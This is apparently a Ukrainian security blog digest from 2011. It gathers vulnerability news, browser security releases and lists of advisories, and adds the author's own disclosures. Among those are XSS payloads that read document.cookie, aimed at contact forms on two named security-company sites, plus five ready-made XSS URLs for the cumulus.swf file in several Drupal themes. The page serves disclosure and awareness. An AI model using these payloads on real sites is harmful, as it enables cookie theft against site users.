Websecurity - Веб безпека

За повідомленням www.xakep.ru, уразливість в Apache наражає на небезпеку фаєрволи, роутери.

Фахівці, що обслуговують сервер Apache, попереджають, що їх HTTP daemon уразливий перед експлоітами, що дають шанс нападнику передати спеціальні команди в адресі внутрішнім серверам.

За повідомленням www.anti-malware.ru, міністерство внутрішньої безпеки США розробило інструмент для оцінки кіберзахисту.

Продукт за назвою Cyber Security Evaluation Tool (CSET) був розроблений фахівцями міністерства разом з Національним інститутом стандартизації і технологій, щоб допомогти підприємствам і організаціям у забезпеченні належного захисту їхніх інформаційних активів.

За повідомленням bl0g.yehg.net, Google: Malware URL Redirection (Google Arbitrary URL Redirect Vulnerability).

Деякий час тому представники YGN Ethical Hacker Group оприлюднили URL Redirector Abuse уразливість на сайті Гугла. Раніше я вже неодноразово писав про редиректори Гугла - зі старих редиректорів один все ще працює автоматично, а один вимагає хеша.

Вони взяли один зі старих редиректорів (що я описав в січні 2008 року, який вимагає хеша) і детально його розібрали, яким чином можна підібрати значення usg. Зокрема один з підходів аналогічний описаному мною у вересні методу обходу захисту в images.google.com.

08.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://scb-ua.com - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.scb-ua.com.

Детальна інформація про уразливості з’явиться пізніше.

05.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://scb-ua.com/_kontakty_i_karta_proezda_0_11_menu_0_1.html
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Зараз даний сайт, який належить секюріті фірмі, не працює (мабуть вони вірішили, що найбільш безпечно взагалі не мати сайта). А на домені scb-ua.com знаходиться зовсім інший сайт, в якому дірок також вистачає .

У вересні, 16.09.2011, через півтора місяці після виходу Google Chrome 13, вийшов Google Chrome 14.

В браузері зроблено ряд нововведень. А також виправлено 32 помилки у безпеці, з яких 15 уразливостей позначені як небезпечні, 10 - помірні і 7 - незначні. Серед небезпечних проблем фігурує кілька звертань до областей пам’яті після їхнього очищення, ефект гонки при роботі з кешем сертифікатів, крахи в движку V8, проблема зі збирачем сміття в переглядачі PDF.

• Релиз web-браузера Chrome 14 (деталі)

В даній добірці уразливості в веб додатках:

• SAP WebAS ITS Mobile Test Service Multiple Vulnerabilities (деталі)
• Path disclosure in PrestaShop (деталі)
• SAP WebAS ITS Mobile Start Service Multiple Vulnerabilities (деталі)
• TOTVS ERP Microsiga Protheus - Users Enumeration (деталі)
• Proofpoint Protection Server Cross-Site Scripting Vulnerability (деталі)
• LMS Web Ensino - Multiple XSS, Session Fixation, CSRF and SQL Injection (деталі)
• Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface (деталі)
• ‘Quick Polls’ Local File Inclusion & Deletion Vulnerabilities (деталі)
• Authentication Bypass in Configuration Import and Export of ZyXEL ZyWALL USG Appliances (деталі)
• XSS in CubeCart <= 2.0.7 (деталі)

07.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на http://varta.net.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на varta.net.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.10.2011

Insufficient Anti-automation:

На сторінці контактів (http://varta.net.ua/index.php?lang_id=1 &menu_id=8) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://varta.net.ua/index.php?lang_id=1&menu_id=8
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Дані уразливості досі не виправлені.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://usta.rcf.crimea.ua - інфекція була виявлена 25.09.2011. Зараз сайт входить до переліку підозрілих.
• http://samsebelekar.at.ua - інфекція була виявлена 29.07.2011. Зараз сайт не входить до переліку підозрілих.
• http://golden-brig.org.ua - інфекція була виявлена 27.09.2011. Зараз сайт входить до переліку підозрілих.
• http://apostille-perevod.com.ua - інфекція була виявлена 21.08.2011. Зараз сайт не входить до переліку підозрілих.
• http://gribok.at.ua - інфекція була виявлена 27.08.2011. Зараз сайт не входить до переліку підозрілих.

На минулому тижні, 28.09.2011, вийшов Mozilla Firefox 7. Нова версія браузера вийшла через півтора місяця після виходу Firefox 6 і через 22 доби після виходу Firefox 6.0.2.

Mozilla офіційно представила реліз веб браузера Firefox 7.0, до складу якого включені давно очікувані наробітки по скороченню споживання пам’яті. Випуск Firefox 8 очікується через 6 тижнів, у середині листопада, а Firefox 9 вийде наприкінці року. Крім того, також були випущені Firefox 3.6.23, Firefox 7 for Android, Seamonkey 2.4 і Thunderbird 7.0.

Додам, що вже 29.09.2011 Мозіла випустила Firefox 7.0.1, в якому виправила проблему з доповненнями до браузера (що зникали в версії 7.0).

Зазначу, що окрім нововведень і виправлення помилок у Firefox 7.0 і Firefox 3.6.23 усунути численні уразливості. Усього усунуто 10 уразливостей, з яких 8 мають критичний характер і можуть привести до виконання коду зловмисника при відкритті спеціально створених сторінок.

• Релиз Firefox 7.0 и сопутствующих проектов Mozilla (деталі)

В даній добірці уразливості в веб додатках:

• HP Network Automation Running on Linux, Solaris, and Windows, Remote Information Disclosure (деталі)
• Path disclosure in Tribiq CMS (деталі)
• HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability (деталі)
• XSS vulnerability in xtcModified (деталі)
• Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified Communications Manager (деталі)
• XSS vulnerability in xtcModified (деталі)
• RSA, The Security Division of EMC, announces a fix for a security vulnerability in RSA Data Loss Prevention (деталі)
• XSS vulnerability in xtcModified (деталі)

Раніше я вже писав про уразливість в плагінах для Serendipity, Social Web CMS, PHP-Fusion, Magento та Sweetcron. А також писав про аналогічну уразливість в багатьох плагінах для різних движків, в тому числі в Cumulus для Drupal.

Така ж уразливість є і в багатьох темах для Drupal, що використовують cumulus.swf (це той самий файл tagcloud.swf розроблений автором WP-Cumulus). Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в багатьох темах для Drupal. Зокрема вразливі теми Admire Grunge, Morok, Pushbutton, Danland і Analytic. Всі теми для Друпал (як і для інших движків), що використовують дану флешку, є вразливими. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії тем Admire Grunge, Morok, Pushbutton, Danland і Analytic для Drupal.

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 3.6, Firefox 6.0, Thunderbird 6.0, SeaMonkey 2.3.

Численні пошкодження пам’яті, міжсайтовий скриптинг, виконання коду.

• Mozilla Foundation Security Advisory 2011-36 (деталі)
• Mozilla Foundation Security Advisory 2011-37 (деталі)
• Mozilla Foundation Security Advisory 2011-38 (деталі)
• Mozilla Foundation Security Advisory 2011-39 (деталі)
• Mozilla Foundation Security Advisory 2011-40 (деталі)
• Mozilla Foundation Security Advisory 2011-41 (деталі)
• Mozilla Foundation Security Advisory 2011-42 (деталі)
• Mozilla Foundation Security Advisory 2011-43 (деталі)
• Mozilla Foundation Security Advisory 2011-44 (деталі)
• Mozilla Foundation Security Advisory 2011-45 (деталі)